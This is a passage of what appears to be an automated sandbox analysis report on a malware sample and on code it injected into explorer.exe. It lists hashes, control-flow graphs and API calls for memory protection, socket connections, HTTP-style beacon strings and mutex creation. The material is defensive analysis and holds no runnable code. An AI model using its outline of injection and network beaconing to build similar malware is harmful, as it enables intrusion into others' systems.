                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                  • API String ID: 0-3177188983
                                  • Opcode ID: 12b4d72e27fa7f8322d06c4a7a044918107d7e27006ab8e447ea1f96f249d165
                                  • Instruction ID: ccecc2dcbb6b071fd3e107c012a6e81c582c39697ccf4ca897e8668307f5a3c1
                                  • Opcode Fuzzy Hash: 12b4d72e27fa7f8322d06c4a7a044918107d7e27006ab8e447ea1f96f249d165
                                  • Instruction Fuzzy Hash: 7D41D8B0600204FBDB24EB68DC89FAA77B9EF44710F208615F955D72D2D67CED528760
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID: __fassign
                                  • String ID:
                                  • API String ID: 3965848254-0
                                  • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                  • Instruction ID: 3c123995bb8216e2d328b87d6bbdc2c6c000a0e32058bc97e5d35d372c73db28
                                  • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                  • Instruction Fuzzy Hash: CF91D671E0020AEFDF24DF58D8456EEBBB4FF55304F24807AD842A7162E7395A51CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID: __aulldvrm
                                  • String ID: $$0
                                  • API String ID: 1302938615-389342756
                                  • Opcode ID: 4beaf5e29e1591462d9b3bb46aa6f941306071a50b2db0de6fd35cf3dc8226e4
                                  • Instruction ID: 5b5e5360dc5f21a76ce88e20211e03c6e6e85db3367fa2854b88a9a5b785b0b3
                                  • Opcode Fuzzy Hash: 4beaf5e29e1591462d9b3bb46aa6f941306071a50b2db0de6fd35cf3dc8226e4
                                  • Instruction Fuzzy Hash: 5591A530D066CDDFDF25CFAAC8853EDBBB1AF49318F14465AD4A1AB291C7784A41CB50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Strings
                                  • Set 0x%X protection for %p section for %d bytes, old protection 0x%X, xrefs: 007AE893
                                  • ]x, xrefs: 007AE75B
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID: _wcstoul
                                  • String ID: Set 0x%X protection for %p section for %d bytes, old protection 0x%X$]x
                                  • API String ID: 1097018459-3343864547
                                  • Opcode ID: 25cea16187418f65a94f002e54d1e26c17bd52413924c558e6d4ea6293bedfc6
                                  • Instruction ID: bd677a5325f568174c220776ac0db13bf5c9d48c7bc308bd63513658312d371a
                                  • Opcode Fuzzy Hash: 25cea16187418f65a94f002e54d1e26c17bd52413924c558e6d4ea6293bedfc6
                                  • Instruction Fuzzy Hash: D441B172C00249EADF10DFE4C885BEEB7B8AF86310F10966AF551A7081E77CDA94C760
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Strings
                                  • {%08lx-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x}, xrefs: 0076C5BB
                                  • 1s, xrefs: 0076C56F
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: 1s${%08lx-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x}
                                  • API String ID: 48624451-1946412030
                                  • Opcode ID: f548b2fb9f9479ea38822a3b4a3bcba0772a09b9fffda3703d27a02004c228ab
                                  • Instruction ID: 7ac45f81307a6df3911eb3b7c5e6960220cc8496fe21478108cd81518d30aade
                                  • Opcode Fuzzy Hash: f548b2fb9f9479ea38822a3b4a3bcba0772a09b9fffda3703d27a02004c228ab
                                  • Instruction Fuzzy Hash: 100161A60085B065D72187AB4C11832FBF99FCEA15728C08EF6D98A296E17FC542D770
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • _wcstoul.LIBCMT ref: 007AE901
                                    • Part of subcall function 007E5AA6: __cftof.LIBCMT ref: 007E5AB6
                                  Strings
                                  • CLIENT(ntdll): Tyring to fix protection for %ws section in %wZ module to 0x%X, xrefs: 007AE91B
                                  • ]x, xrefs: 007AE8E3
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID: __cftof_wcstoul
                                  • String ID: CLIENT(ntdll): Tyring to fix protection for %ws section in %wZ module to 0x%X$]x
                                  • API String ID: 1831096779-1492471241
                                  • Opcode ID: ed90c1bd5624fdd1ee8aad0d7513934891cea9aa4e2d05dfc58d92c89a28b082
                                  • Instruction ID: 8c3ae768993fb968cd615eb077720415bb297a59bf99a083496460f99a0ec5ba
                                  • Opcode Fuzzy Hash: ed90c1bd5624fdd1ee8aad0d7513934891cea9aa4e2d05dfc58d92c89a28b082
                                  • Instruction Fuzzy Hash: E4F0F637140208BADB142A55DC07E9B77ACDFD5B20F008219FA059A092EAB9EA0087A1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Execution Graph

                                  Execution Coverage:2.4%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:0%
                                  Total number of Nodes:457
                                  Total number of Limit Nodes:18

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.850934838.0000000008010000.00000040.80000000.00040000.00000000.sdmp, Offset: 08010000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_8010000_explorer.jbxd
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID: `
                                  • API String ID: 823142352-2679148245
                                  • Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                  • Instruction ID: d8718386cc2b237ee352ae4d2ac08a5b680d8797b8c4dfb83e7b3cd258aa31e6
                                  • Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                  • Instruction Fuzzy Hash: C6223C70A18A0A9FCB99EF28C4956AEF7E2FB58301F50462ED45ED7250DF30E452CB85
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  control_flow_graph 457 8080e12-8080e38 458 8080e45-8080e6e NtProtectVirtualMemory 457->458 459 8080e40 call 807f942 457->459 460 8080e7d-8080e8f 458->460 461 8080e70-8080e7c 458->461 459->458
                                  APIs
                                  • NtProtectVirtualMemory.NTDLL ref: 08080E67
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.850934838.0000000008010000.00000040.80000000.00040000.00000000.sdmp, Offset: 08010000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_8010000_explorer.jbxd
                                  Similarity
                                  • API ID: MemoryProtectVirtual
                                  • String ID:
                                  • API String ID: 2706961497-0
                                  • Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                  • Instruction ID: 00e57465d816df9541aeee42de8662c2b46ddd71b9acb63e7008863a7cd3c18f
                                  • Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                  • Instruction Fuzzy Hash: ED01B534668B484F8784EF6CD480166B7E4FBDD315F000B3EE59AC3250DB70C5414742
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  control_flow_graph 462 8080e0a-8080e6e call 807f942 NtProtectVirtualMemory 465 8080e7d-8080e8f 462->465 466 8080e70-8080e7c 462->466
                                  APIs
                                  • NtProtectVirtualMemory.NTDLL ref: 08080E67
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.850934838.0000000008010000.00000040.80000000.00040000.00000000.sdmp, Offset: 08010000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_8010000_explorer.jbxd
                                  Similarity
                                  • API ID: MemoryProtectVirtual
                                  • String ID:
                                  • API String ID: 2706961497-0
                                  • Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                  • Instruction ID: 3965299f0f098fb8699ec52b8f35112692eae78049723e5f24bc9b622907b851
                                  • Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                  • Instruction Fuzzy Hash: E101A234628B884B8B48EB2C94412A6B3E5FBCE315F000B3EE9DAC3240DB31D5024782
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

control_flow_graph 0 807ff82-807ffb6 1 807ffd6-807ffd9 0->1 2 807ffb8-807ffbc 0->2 4 80808fe-808090c 1->4 5 807ffdf-807ffed 1->5 2->1 3 807ffbe-807ffc2 2->3 3->1 6 807ffc4-807ffc8 3->6 7 807fff3-807fff7 5->7 8 80808f6-80808f7 5->8 6->1 9 807ffca-807ffce 6->9 10 807ffff-8080000 7->10 11 807fff9-807fffd 7->11 8->4 9->1 13 807ffd0-807ffd4 9->13 12 808000a-8080010 10->12 11->10 11->12 14 808003a-8080060 12->14 15 8080012-8080020 12->15 13->1 13->5 17 8080068-808007c call 807c5b2 14->17 18 8080062-8080066 14->18 15->14 16 8080022-8080026 15->16 16->8 19 808002c-8080035 16->19 24 8080081-80800a2 17->24 18->17 20 80800a8-80800ab 18->20 19->8 22 80800b1-80800b8 20->22 23 8080144-8080150 20->23 25 80800ba-80800dc call 807f942 22->25 26 80800e2-80800f5 22->26 27 80808ee-80808ef 23->27 28 8080156-8080165 23->28 24->20 24->27 25->26 26->27 30 80800fb-8080101 26->30 27->8 31 808017f-808018f 28->31 32 8080167-8080178 call 807c552 28->32 30->27 36 8080107-8080109 30->36 33 8080191-80801ad call 807c732 31->33 34 80801e5-808021b 31->34 32->31 43 80801b2-80801da 33->43 39 808022d-8080231 34->39 40 808021d-808022b 34->40 36->27 41 808010f-8080111 36->41 45 8080233-8080245 39->45 46 8080247-808024b 39->46 44 808027f-8080280 40->44 41->27 47 8080117-8080132 getaddrinfo 41->47 43->34 48 80801dc-80801e1 43->48 52 8080283-80802e0 call 8080d62 call 807d482 call 807ce72 call 8081002 44->52 45->44 49 808024d-808025f 46->49 50 8080261-8080265 46->50 47->23 51 8080134-808013c 47->51 48->34 49->44 53 808026d-8080279 50->53 54 8080267-808026b 50->54 51->23 63 80802e2-80802e6 52->63 64 80802f4-8080354 call 8080d92 52->64 53->44 54->52 54->53 63->64 65 80802e8-80802ef call 807d042 63->65 69 808035a-8080396 call 8080d62 call 8081262 call 8081002 64->69 70 808048c-80804b8 call 8080d62 call 8081262 64->70 65->64 85 8080398-80803b7 call 8081262 call 8081002 69->85 86 80803bb-80803e9 call 8081262 * 2 69->86 79 80804d9-8080590 call 8081262 * 3 call 8081002 * 2 call 807d482 70->79 80 80804ba-80804d5 70->80 111 8080595-80805b9 call 8081262 79->111 80->79 85->86 101 80803eb-8080410 call 8081002 call 8081262 86->101 102 8080415-808041d 86->102 101->102 103 808041f-8080425 102->103 104 8080442-8080448 102->104 108 8080467-8080487 call 8081262 103->108 109 8080427-808043d 103->109 110 808044e-8080456 104->110 104->111 108->111 109->111 110->111 115 808045c-808045d 110->115 120 80805bb-80805cc call 8081262 call 8081002 111->120 121 80805d1-80806ad call 8081262 * 7 call 8081002 call 8080d62 call 8081002 call 807ce72 call 807d042 111->121 115->108 132 80806af-80806b3 120->132 121->132 134 80806ff-808072d call 807c6b2 132->134 135 80806b5-80806fa call 807c382 call 807c7b2 132->135 145 808075d-8080761 134->145 146 808072f-8080735 134->146 155 80808e6-80808e7 135->155 147 808090d-8080913 145->147 148 8080767-808076b 145->148 146->145 151 8080737-808074c 146->151 157 8080779-8080784 147->157 158 8080919-8080920 147->158 152 80808aa-80808df call 807c7b2 148->152 153 8080771-8080773 148->153 151->145 156 808074e-8080754 151->156 152->155 153->152 153->157 155->27 156->145 163 8080756 156->163 159 8080795-8080796 157->159 160 8080786-8080793 157->160 158->160 164 808079c-80807a0 159->164 160->159 160->164 163->145 167 80807b1-80807b2 164->167 168 80807a2-80807af 164->168 170 80807b8-80807c4 167->170 168->167 168->170 173 80807f4-8080861 setsockopt recv 170->173 174 80807c6-80807ef call 8080d92 call 8080d62 170->174 177 80808a3-80808a4 173->177 178 8080863 173->178 174->173 177->152 178->177 179 8080865-808086a 178->179 179->177 182 808086c-8080872 179->182 182->177 185 8080874-80808a1 182->185 185->177 185->178
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.850934838.0000000008010000.00000040.80000000.00040000.00000000.sdmp, Offset: 08010000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_8010000_explorer.jbxd
                                  Similarity
                                  • API ID: getaddrinforecvsetsockopt
                                  • String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
                                  • API String ID: 1564272048-1117930895
                                  • Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                  • Instruction ID: c898b972d41b24fa834168add50398d6d88f62c2189c652ba7c19b29c5fb4704
                                  • Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                  • Instruction Fuzzy Hash: 5F526D34614A08CBDB69EF68C4947E9B7E2FF54301F50462EC49FC7246EE70A58ACB85
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  APIs
                                  • ObtainUserAgentString.URLMON ref: 0807A9A0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.850934838.0000000008010000.00000040.80000000.00040000.00000000.sdmp, Offset: 08010000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_8010000_explorer.jbxd
                                  Similarity
                                  • API ID: AgentObtainStringUser
                                  • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                  • API String ID: 2681117516-319646191
                                  • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                  • Instruction ID: bc1c66dcb1ffab46af982a267f5ed1232edcf388f97b4c1756d2a74d363d1396
                                  • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                  • Instruction Fuzzy Hash: BA31B171A14A5C8BCB44EFA8C8847EEB7E2FF58216F40422AD45ED7340DE748645CB99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  APIs
                                  • ObtainUserAgentString.URLMON ref: 0807A9A0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.850934838.0000000008010000.00000040.80000000.00040000.00000000.sdmp, Offset: 08010000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_8010000_explorer.jbxd
                                  Similarity
                                  • API ID: AgentObtainStringUser
                                  • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                  • API String ID: 2681117516-319646191
                                  • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                  • Instruction ID: 595aa93a0706b12d20e03a1cddd51798cad3b96d7a695067b485849896a65783
                                  • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                  • Instruction Fuzzy Hash: 7C21D270A10A5D8BCB44FFA8C8847EEBBE2FF58206F40422AD45AD7340DF748645CB99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  control_flow_graph 232 8076b66-8076b68 233 8076b93-8076bb8 232->233 234 8076b6a-8076b6b 232->234 237 8076bbb-8076bbc 233->237 235 8076bbe-8076c22 call 807d612 call 807f942 * 2 234->235 236 8076b6d-8076b71 234->236 246 8076cdc 235->246 247 8076c28-8076c2b 235->247 236->237 238 8076b73-8076b92 236->238 237->235 238->233 249 8076cde-8076cf6 246->249 247->246 248 8076c31-8076cd3 call 8081da4 call 8081022 call 80813e2 call 8081022 call 80813e2 CreateMutexW 247->248 248->246 263 8076cd5-8076cda 248->263 263->249
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.850934838.0000000008010000.00000040.80000000.00040000.00000000.sdmp, Offset: 08010000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_8010000_explorer.jbxd
                                  Similarity
                                  • API ID: CreateMutex
                                  • String ID: .dll$el32$kern
                                  • API String ID: 1964310414-1222553051
                                  • Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                  • Instruction ID: a833c464ef8e2f506d5904e57bfcbbde1d723264f1448774614c91cb1bd5a37c
                                  • Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                  • Instruction Fuzzy Hash: 8E414974918A0CCFDB94EFA8C8946E977E1FF68301F04427AC84EDB255DA309946CB85
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.850934838.0000000008010000.00000040.80000000.00040000.00000000.sdmp, Offset: 08010000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_8010000_explorer.jbxd
                                  Similarity
                                  • API ID: CreateMutex
                                  • String ID: .dll$el32$kern
                                  • API String ID: 1964310414-1222553051
                                  • Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                  • Instruction ID: b072340120553c762446239dddcf56900df20a6e12c1a6f08eb519d81faf74b8
                                  • Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                  • Instruction Fuzzy Hash: EF412674918A0C8FDB84EFA8C899BED77E1FF68301F04417AC84EDB255DA309946CB85
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  control_flow_graph 293 807c72e-807c768 294 807c76a-807c782 call 807f942 293->294 295 807c788-807c7ab connect 293->295 294->295
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.850934838.0000000008010000.00000040.80000000.00040000.00000000.sdmp, Offset: 08010000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_8010000_explorer.jbxd
                                  Similarity
                                  • API ID: connect
                                  • String ID: conn$ect
                                  • API String ID: 1959786783-716201944
                                  • Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                  • Instruction ID: 533f42c3dbbf9ef8caba28e176f065ace1e38b0d790cf8162beec1c7423af9ac
                                  • Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                  • Instruction Fuzzy Hash: 5A014C30618B188FCB84EF1CE088B55B7E0EB58315F1545AE990DCB226CA74C8818BC2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  control_flow_graph 298 807c732-807c768 299 807c76a-807c782 call 807f942 298->299 300 807c788-807c7ab connect 298->300 299->300
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.850934838.0000000008010000.00000040.80000000.00040000.00000000.sdmp, Offset: 08010000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_8010000_explorer.jbxd
                                  Similarity
                                  • API ID: connect
                                  • String ID: conn$ect
                                  • API String ID: 1959786783-716201944
                                  • Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                  • Instruction ID: 13cd4e165c70899260ba7f03f282469d27de011a797fff4ae4e7cf7c8b958bc5
                                  • Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                  • Instruction Fuzzy Hash: FD012C70618A1C8FCB84EF5CE088B55B7E0FB59315F1541AEA90DCB226CB74C9818BC2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  control_flow_graph 303 807c62c-807c66b 304 807c66d-807c685 call 807f942 303->304 305 807c68b-807c6a6 WSAStartup 303->305 304->305
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.850934838.0000000008010000.00000040.80000000.00040000.00000000.sdmp, Offset: 08010000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_8010000_explorer.jbxd
                                  Similarity
                                  • API ID: Startup
                                  • String ID: WSAS$tart
                                  • API String ID: 724789610-2426239465
                                  • Opcode ID: eb8e01195b1b45a2b093131951349e4bfa8de15468bd518a6435d0ff3ce2d302
                                  • Instruction ID: 1c0f6886f1e1038b7396c2f511fdfa511a8f04994c0d52485c53ea85385a1617
                                  • Opcode Fuzzy Hash: eb8e01195b1b45a2b093131951349e4bfa8de15468bd518a6435d0ff3ce2d302
                                  • Instruction Fuzzy Hash: 1D018B70919A188FCB44DF1CD488B69BBE0FB58312F2502ADD409CB266C7B0C9428B9A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  control_flow_graph 308 807c632-807c66b 309 807c66d-807c685 call 807f942 308->309 310 807c68b-807c6a6 WSAStartup 308->310 309->310
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.850934838.0000000008010000.00000040.80000000.00040000.00000000.sdmp, Offset: 08010000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_8010000_explorer.jbxd
                                  Similarity
                                  • API ID: Startup
                                  • String ID: WSAS$tart
                                  • API String ID: 724789610-2426239465
                                  • Opcode ID: 8ca80b95c4f802a72df079fcfff649d32c96cc10ab9ce8db75eb9f3d41236f43
                                  • Instruction ID: 5f7625bd83424666c5aec5fb94b4744d2ea96438cf31675f465b30b30cdfc6f2
                                  • Opcode Fuzzy Hash: 8ca80b95c4f802a72df079fcfff649d32c96cc10ab9ce8db75eb9f3d41236f43
                                  • Instruction Fuzzy Hash: C9014B70519A188FCB84DF1C9088B69BBE0FB58351F2541A9E40DCB266C7B0C9428B9A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  control_flow_graph 421 807c6b2-807c6e5 422 807c6e7-807c6ff call 807f942 421->422 423 807c705-807c72d send 421->423 422->423
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.850934838.0000000008010000.00000040.80000000.00040000.00000000.sdmp, Offset: 08010000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_8010000_explorer.jbxd
                                  Similarity
                                  • API ID: send
                                  • String ID: send
                                  • API String ID: 2809346765-2809346765
                                  • Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                  • Instruction ID: 9ef04705605b14c735fc0d82cc6e21fd00f3e0b47a77ddd2250be2e0b70dbbef
                                  • Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                  • Instruction Fuzzy Hash: F1011270618A1C8FDBC4EF1CD048B6577E1EB58315F1545AED85DCB266CA70D881CB85
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  control_flow_graph 426 807c5b2-807c5ea 427 807c5ec-807c604 call 807f942 426->427 428 807c60a-807c62b socket 426->428 427->428
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.850934838.0000000008010000.00000040.80000000.00040000.00000000.sdmp, Offset: 08010000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_8010000_explorer.jbxd
                                  Similarity
                                  • API ID: socket
                                  • String ID: sock
                                  • API String ID: 98920635-2415254727
                                  • Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                  • Instruction ID: c63f6deec46a3d996e6a51eb5becea3863cdc18775ee45ecd18b133e1c239be3
                                  • Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                  • Instruction Fuzzy Hash: 0C01217061861C8FCB84EF1CD048B55BBE0FB59315F1545ADD45EDB266C7B0C9818B86
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

